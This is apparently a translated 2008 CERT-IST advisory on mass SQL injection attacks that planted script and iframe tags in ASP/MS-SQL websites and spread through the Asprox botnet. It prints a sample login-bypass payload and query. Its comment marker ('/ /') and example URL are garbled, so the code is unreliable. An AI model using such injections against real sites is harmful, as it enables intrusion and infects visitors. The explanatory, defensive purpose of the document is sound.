They involved the release of two potential dangers (CERT-IST/DG-2008.003 and CERT-IST/DG-2008.005), a "VulnCoord" (VulnCoord-2008.010) and the hub of crisis management [Infections web].

 We though interesting to sum these attacks up in an article.

 
Principle of SQL injection attacks

 They are performed by an attacker against a website, which dynamically generates SQL requests from data entered by users.

 To remind the principle of these attacks, we will take the very classic example of a web page containing an authentication entry form with a username and password.

 When the user validates the form, an URL like the following one is sent to the website:

https: / / site-web/dossier? user name and password = = xxxxx

 The website then generates an SQL request like the following one to search for the user in its database:

SELECT * FROM users WHERE user = '$ user' AND password = '$ password'

 
If a malicious person who knows a user named 'Martin', submits the following string in the username field:

Martin '/ /'

The request is then processed as the following one:

SELECT * FROM users WHERE user = 'Martin' / /''AND password = '$ password'

 The attacker is then authenticated as "Martin" without having to submit Martin's password .

 Note: the sequence of characters "/ /" is a marker for comment. In our example it is used to bypass the password control by commenting the end of the SQL request.

 By using various forms, of this attack it is possible to illegally read or change the information stored in a database.

 
Specificity of attacks in recent months

 The general idea of these attacks is first to infect websites in such a way to attack victims who browse these websites.

 The attacked websites should have the following characteristics:

• they are built around a database that stores editorial content that the web server uses to generate dynamic web pages.
• they have been developed in a Windows environment (ASP pages, MS-SQL database)
• they are vulnerable to SQL injection vulnerabilities.

 SQL injection is used in the first phase of the attack to inject malicious HTML tags "<script>" (JavaScript) or "<iframe>" (including web pages of a third site) in the editorial content stored in databases.

Once the database is altered, the dynamically generated web pages contain data with the <script> or <iframe> tags chosen by the hackers. They are therefore able to exploit any vulnerability (Windows, Internet Explorer,…) on the system of victims who try to view them.

 
In the second phase of the attack, it targets users who consult infected websites.

The vulnerable websites are not directly targeted, but they are used as attack vectors against victims browsing them.

Note: SQL injection used in the first phase of the attack exploits vulnerabilities in web applications and not a vulnerability in the software tools used by these applications (IIS, SQL server,…).

These attacks have surprised by their scale (tens or even hundreds of thousands infected websites). This is due to two reasons:

1. The existence of a malicious tool that automates these attacks.
   The SANS has retrieved such a tool and has analyzed it.
   This tool contains a search engine (which can be customized) which uses Google to identify vulnerable web sites. Once vulnerable websites have been identified, this tool performs SQL injection attacks against them and injects malicious tags (also configurable) in webpages.
   
2. A tool of this type has been inserted in the "Asprox" botnet.
   This allows it to infect vulnerable websites in such a way to spread in a second step on the system of victims who visit these sites.

For more information:

• Microsoft (recent attacks): http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx
• Microsoft (SQL injections): http://msdn.microsoft.com/en-us/library/ms161953.aspx
• SANS: http://isc.sans.org/diary.html?storyid=4294
• Asprox: http://www.secureworks.com/research/threats/danmecasprox/